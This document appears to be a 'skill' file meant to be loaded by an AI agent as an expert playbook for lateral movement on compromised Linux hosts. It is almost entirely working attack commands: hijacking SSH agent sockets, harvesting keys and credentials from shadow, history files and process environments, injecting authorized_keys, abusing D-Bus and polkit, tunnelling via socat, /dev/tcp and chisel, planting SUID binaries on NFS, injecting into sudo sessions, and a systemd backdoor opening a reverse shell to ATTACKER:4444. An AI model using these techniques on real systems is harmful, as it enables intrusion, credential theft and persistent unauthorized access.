- SKILL: Linux Lateral Movement — Expert Attack Playbook
- AI LOAD INSTRUCTION
- Expert Linux lateral movement techniques. Covers SSH agent hijacking, key harvesting, credential locations, D-Bus exploitation, network pivoting, sudo token reuse, and systemd manipulation. Base models miss SSH_AUTH_SOCK hijacking and ptrace-based sudo session hijack. 0. RELATED ROUTING Before going deep, consider loading: linux-privilege-escalation if you need root on the current host before pivoting linux-security-bypass when restricted shells or security modules block lateral movement tools container-escape-techniques when the target network includes containerized hosts kubernetes-pentesting when pivoting into a Kubernetes cluster unauthorized-access-common-services for exploiting discovered internal services (Redis, MongoDB, etc.) 1. SSH AGENT HIJACKING 1.1 Find SSH Agent Sockets
As root (or user with access to other users' processes):
find /tmp -path "/ssh-" -name "agent.*" 2
/dev/null
Or via /proc:
grep -r SSH_AUTH_SOCK /proc/*/environ 2
/dev/null | tr '\0' '\n'
Typical path: /tmp/ssh-XXXXXX/agent.PID
1.2 Hijack Agent Forwarding
Set the found socket as our auth agent
export SSH_AUTH_SOCK = /tmp/ssh-AbCdEf/agent.12345
List available keys in the agent
ssh-add -l
If keys appear → we can use them
SSH to any host this agent can authenticate to
ssh -o StrictHostKeyChecking = no user@internal-host
The agent owner won't notice — we're using their forwarded agent
1.3 Persistent Agent Monitoring
Monitor for new SSH agent sockets (wait for admin to SSH in)
inotifywait -m /tmp -e create 2
/dev/null | grep ssh-
Or poll:
while true ; do find /tmp -path "/ssh-" -name "agent.*" -newer /tmp/.marker 2
/dev/null touch /tmp/.marker sleep 5 done 2. SSH KEY HARVESTING 2.1 Private Key Locations find / -name "id_rsa" -o -name "id_ed25519" -o -name ".pem" -o -name ".key" 2
/dev/null
Also: /etc/ssh/ssh_host__key (MITM), /home//.ssh/id_*
Find keys without passphrase:
for key in $( find / -name "id_" ! -name ".pub" 2
/dev/null ) ; do ssh-keygen -y -P "" -f " $key "
/dev/null 2
&1 && echo "NO PASSPHRASE: $key " done 2.2 known_hosts Parsing
Hashed known_hosts (common default):
cat ~/.ssh/known_hosts
May be hashed — use ssh-keygen to check against known IPs:
ssh-keygen -F 10.0 .0.1 -f ~/.ssh/known_hosts
Unhashed known_hosts → direct IP/hostname list
awk '{print $1}' ~/.ssh/known_hosts | sort -u
Extract all hostnames/IPs from all users' known_hosts
cat /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2
/dev/null \ | awk '{print $1}' | tr ',' '\n' | sort -u 2.3 authorized_keys Injection
Generate attacker keypair (on attacker box)
ssh-keygen -t ed25519 -f /tmp/pivot_key -N ""
Inject public key (on compromised host)
echo "ssh-ed25519 AAAA...attacker_pubkey..."
/root/.ssh/authorized_keys echo "ssh-ed25519 AAAA...attacker_pubkey..."
/home/admin/.ssh/authorized_keys
SSH back in with our key
ssh -i /tmp/pivot_key root@target 3. CREDENTIAL HARVESTING LOCATIONS 3.1 System Credentials Location Contents Command /etc/shadow Password hashes cat /etc/shadow (root) /etc/passwd User list, may contain hashes cat /etc/passwd .bash_history Command history (passwords in cleartext) cat /home//.bash_history .mysql_history MySQL commands with passwords cat /home//.mysql_history .psql_history PostgreSQL commands cat /home//.psql_history .pgpass PostgreSQL password file cat /home//.pgpass .my.cnf MySQL credentials cat /home//.my.cnf .netrc FTP/HTTP auto-login credentials cat /home//.netrc .git-credentials Git HTTPS passwords cat /home/*/.git-credentials 3.2 Environment & Config Files
Current process secrets
env | grep -iE "pass|key|secret|token|api|cred|auth"
All process environments (root):
for pid in /proc/ [ 0 -9 ] * ; do cat $pid /environ 2
/dev/null | tr '\0' '\n' | grep -iE "pass|key|secret|token" done
Application configs (common credential locations):
find /var/www /opt /srv -name "wp-config.php" -o -name "settings.py" \ -o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" 2
/dev/null
Keyrings & secret stores:
find / -name ".keyring" -o -name ".vault-token" -o -path "/.password-store/*.gpg" 2
/dev/null 4. D-BUS EXPLOITATION 4.1 Enumerate D-Bus Services
List system bus services
dbus-send --system --dest = org.freedesktop.DBus \ --type = method_call --print-reply \ /org/freedesktop/DBus org.freedesktop.DBus.ListNames
List session bus services
dbus-send --session --dest = org.freedesktop.DBus \ --type = method_call --print-reply \ /org/freedesktop/DBus org.freedesktop.DBus.ListNames
Introspect a service (find available methods)
dbus-send --system --dest = org.freedesktop.systemd1 \ --type = method_call --print-reply \ /org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect 4.2 Abuse systemd & PolicyKit via D-Bus
Start a service via D-Bus (if policy allows):
dbus-send --system --dest = org.freedesktop.systemd1 \ --type = method_call --print-reply /org/freedesktop/systemd1 \ org.freedesktop.systemd1.Manager.StartUnit \ string: "malicious.service" string: "replace"
polkit actions available without auth:
pkaction --verbose 2
/dev/null | grep -B5 "implicit active: yes" 5. INTERNAL NETWORK PIVOTING 5.1 SSH Tunneling
Local port forward: access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306 :INTERNAL_HOST:3306 pivot@compromised-host
Remote port forward: expose attacker service to internal network
ssh -R 8080 :ATTACKER:8080 pivot@compromised-host
Dynamic SOCKS proxy: route all traffic through pivot
ssh -D 1080 pivot@compromised-host
Then: proxychains nmap -sT INTERNAL_RANGE
SSH over SSH (multi-hop):
ssh -J user1@hop1,user2@hop2 target@final-host 5.2 Without SSH — Alternative Tunnels
socat port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL_HOST:80 &
ncat relay
ncat -l -p 8080 --sh-exec "ncat INTERNAL_HOST 80"
/dev/tcp (Bash built-in, no tools needed)
exec 3 <> /dev/tcp/INTERNAL_HOST/80 echo -e "GET / HTTP/1.0 \r \n Host: INTERNAL_HOST \r \n \r \n "
&3 cat < &3
chisel (SOCKS proxy over HTTP)
On attacker: chisel server -p 8080 --reverse
On target: chisel client ATTACKER:8080 R:socks
5.3 Network Discovery from Compromised Host ss -tlnp && ss -tnp
Listening & established connections
arp -a && ip neigh
Known adjacent hosts
cat /etc/resolv.conf
DNS servers
dig axfr internal.domain @dns 2
/dev/null
Zone transfer
Subnet sweep (bash-only, no tools):
for i in $( seq 1 254 ) ; do ping -c1 -W1 10.0 .0. $i &> /dev/null && echo "ALIVE: 10.0.0. $i " & done ; wait
Port scan via /dev/tcp:
for port in 22 80 443 3306 5432 6379 8080 ; do ( echo
/dev/tcp/10.0.0.1/ $port ) 2
/dev/null && echo "OPEN: $port " done 6. SHARED FILESYSTEM EXPLOITATION 6.1 NFS Mounts
Discover NFS shares
showmount -e FILESERVER_IP 2
/dev/null
Check for no_root_squash (root maps to root)
mount -t nfs FILESERVER_IP:/share /mnt/nfs
If no_root_squash: create SUID binaries visible to other hosts
All hosts mounting the same share → SUID binary = root on all hosts
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash 6.2 SMB/CIFS Shares
Enumerate shares
smbclient -L //FILESERVER_IP/ -N 2
/dev/null
Null session
smbclient -L //FILESERVER_IP/ -U 'user%password'
Mount and search for credentials
mount -t cifs //FILESERVER_IP/share /mnt/smb -o username = user,password = pass find /mnt/smb -name ".conf" -o -name ".cfg" -o -name ".kdbx" \ -o -name ".xlsx" -o -name "*.docx" 2
/dev/null 7. SUDO TOKEN REUSE (ptrace-Based)
If another user has an active sudo session (timestamp not expired):
And we can ptrace their process (same UID or root)
Check sudo timestamp files:
ls -la /var/run/sudo/ts/ 2
/dev/null ls -la /var/db/sudo/ 2
/dev/null
Files here mean active sudo tokens
ptrace-based hijack:
Attach to the user's shell process
Inject: sudo /bin/bash
The injected sudo inherits the valid timestamp → no password needed
Automated tool: sudo_inject
https://github.com/nongiach/sudo_inject
Injects into processes with valid sudo tokens
- SYSTEMD SERVICE MANIPULATION
Find writable unit files:
find /etc/systemd /usr/lib/systemd -writable -name "*.service" 2
/dev/null
Inject into existing service (add ExecStartPre=):
Or create new: /etc/systemd/system/backdoor.service
[Service] Type=oneshot ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
systemctl daemon-reload && systemctl enable --now backdoor.service 9. LATERAL MOVEMENT DECISION TREE Compromised host — where to move next? │ ├── SSH credentials available? │ ├── Private keys found? → try on all known_hosts targets (§2) │ ├── SSH agent running? → hijack socket (§1) │ ├── Passwords in history/configs? → spray across hosts (§3) │ └── authorized_keys writable on other hosts? → inject key (§2.3) │ ├── Network services discovered? │ ├── Internal web apps? → tunnel + attack (§5.1) │ ├── Databases (3306/5432/6379)? → check harvested creds (§3) │ ├── SMB/NFS shares? → mount + search for creds/SUID (§6) │ └── Kubernetes API (6443)? → load kubernetes-pentesting skill │ ├── Can reach other hosts? │ ├── Direct SSH? → use keys/passwords │ ├── Firewalled? → SSH tunnel or chisel (§5) │ └── No tools? → /dev/tcp + bash (§5.2) │ ├── Root on current host? │ ├── Read /etc/shadow → crack hashes → password reuse (§3) │ ├── Dump /proc/*/environ → find service credentials (§3.2) │ ├── Hijack sudo tokens → piggyback admin sessions (§7) │ └── Modify systemd services → backdoor (§8) │ ├── D-Bus services available? │ ├── Privileged services exposed? → method call abuse (§4) │ └── polkit actions without auth? → privilege actions (§4.3) │ └── No obvious path? ├── ARP scan + port sweep internal network (§5.3) ├── Passive credential sniffing (if cap_net_raw) ├── Wait for admin SSH → agent hijack (§1.3) └── Check for cloud metadata (169.254.169.254)